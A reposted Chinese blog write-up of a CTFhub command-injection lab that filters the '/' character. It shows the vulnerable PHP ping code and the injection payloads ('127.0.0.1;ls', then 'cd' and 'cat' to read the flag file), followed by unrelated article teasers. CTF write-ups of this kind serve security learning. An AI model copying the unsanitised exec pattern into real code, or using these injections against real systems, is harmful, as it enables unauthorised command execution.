CTFhub-RCE-过滤目录分隔符 /-编程知识

CTFhub-RCE-过滤目录分隔符 /

news/2025/3/16 18:35:51/文章来源:https://blog.csdn.net/ssss39/article/details/134436298

根据源代码信息可知，过滤掉了/

<?php
$res = FALSE;
if (isset($_GET['ip']) && $_GET['ip']) {
    $ip = $_GET['ip'];
    $m = [];
    if (!preg_match_all("/\//", $ip, $m)) {
        $cmd = "ping -c 4 {$ip}";
        exec($cmd, $res);
    } else {
        $res = $m;
    }
}
?>

1. 查看当前目录 127.00.1;ls

2.

127.0.0.1;cd flag_is_here;ls;cat flag_21082715328454.php

ctfhub{32fc4a6e5efacbcfc917e014}

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.hqwc.cn/news/188924.html

如若内容造成侵权/违法违规/事实不符，请联系编程知识网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

相关文章

HTTPS加密为什么能保证网络安全？

HTTPS加密为什么能保证网络安全？

随着互联网的普及和发展，网络安全问题日益严重。为了保护用户的隐私和数据安全，许多网站都采用了HTTPS加密技术。那么，HTTPS加密为什么可以保证网络安全呢？ 原因是HTTP协议采用的是数据明文传输方式。用户从客户端浏览器提交数据…

阅读更多...

The import xxx.xxx.xxxx is never used

The import xxx.xxx.xxxx is never used

CTRL SHIFT O 就完成了，懒人，代码没洁癖啊，几千上万的代码没用的。

阅读更多...

Theory behind GAN

Theory behind GAN

假如要生成一些人脸图，实际上就是想要找到一个分布，从这个分布内sample出来的图片像是人脸，分布之外生成的就不像人脸。而GAN要做的就是找到这个distribution。在GAN之前用的是Maximum Likelihood Estimation。 Maximum Likelihood Estimat…

阅读更多...

List is a raw type. References to generic type List＜E＞ should be parameterized

List is a raw type. References to generic type List＜E＞ should be parameterized

List is a raw type. References to generic type List<E> should be parameterized 都是代码习惯问题懒

阅读更多...

如何用继承和多态来打印个人信息

如何用继承和多态来打印个人信息

1 问题在python中的数据类型中，我们常常运用继承和多态。合理地使用继承和多态可以增强程序的可扩展性使代码更简洁。那么如何使用继承和多态来打印个人信息？ 2 方法打印基本信息添加子类，再定义一个class，可以直接从Person类继…

阅读更多...

Ubuntu22.04 Apache2安装SSL证书 https

Ubuntu22.04 Apache2安装SSL证书 https

一、免费证书申请 https://help.aliyun.com/zh/ssl-certificate/user-guide/overview-of-free-certificates 得到三、配置执行以下命令，打开default-ssl.conf文件。 vim /etc/apache2/sites-available/default-ssl.conf 在default-ssl.conf配置文件中&#xff…

阅读更多...

html使用天地图写一个地图列表

html使用天地图写一个地图列表

一、效果图： 点击左侧地址列表，右侧地图跟着改变。二、代码实现： 一进入页面时，通过body调用onLoad"onLoad()"函数，确保地图正常显示。 <body onLoad"onLoad()">…

阅读更多...

面试题 Android 如何实现自定义View 固定帧率绘制

面试题 Android 如何实现自定义View 固定帧率绘制

曾经遇到的面试题, 如何实现自定义View 1s内固定帧率的绘制. 当时对Android理解不深, 考虑的不全面, 直接回答了在onDraw结束时通过postDelay发送一个(1000 / 帧数)ms的延时消息触发invalidate进行下一次绘制. 但实际上这样做存在明显的问题实际上1s绘制的帧数是不符合期望帧…

阅读更多...

基于java web的中小型人力资源管理系统

基于java web的中小型人力资源管理系统

末尾获取源码开发语言：Java Java开发工具：JDK1.8 后端框架：SSM 前端：Vue 数据库：MySQL5.7和Navicat管理工具结合服务器：Tomcat8.5 开发软件：IDEA / Eclipse 是否Maven项目：是目录…

阅读更多...

[工业自动化-23]：西门子S7-15xxx编程 - 软件编程 - 西门子PLC人机界面交互HMI功能概述、硬件环境准备、软件环境准备

[工业自动化-23]：西门子S7-15xxx编程 - 软件编程 - 西门子PLC人机界面交互HMI功能概述、硬件环境准备、软件环境准备

目录一、什么是人机界面二、什么是PLC人机交互界面HMI 三、人机界面设计的功能列表四、开发主机与PLC的连接方式五、开发主机与HMI的连接方式六、HMI组态一、什么是人机界面人机界面是指人与机器或系统之间的交互界面。它是人类与计算机或其他设备之间进行信息交换…

阅读更多...

基于STM32的蓝牙低功耗（BLE）通信方案设计与实现

基于STM32的蓝牙低功耗（BLE）通信方案设计与实现

蓝牙低功耗（Bluetooth Low Energy，简称BLE）是一种能够在低功耗环境下实现无线通信的技术。在物联网应用中，BLE被广泛应用于传感器数据采集、健康监测设备、智能家居等领域。本文将基于STM32微控制器，设计并实现一个简单…

阅读更多...

鸿蒙4.0开发笔记之DevEco Studio启动时不直接打开原项目

鸿蒙4.0开发笔记之DevEco Studio启动时不直接打开原项目

1、想要在DevEco Studio启动时不直接打开关闭前的那个项目，可以在设置中进行。有两个位置可以进入“设置”，一个是左上角的File>Settings，二是右上方的设置图标。 2、进入Settings界面以后，选择Appearance&Behavior下面…

阅读更多...

推荐文章

最新文章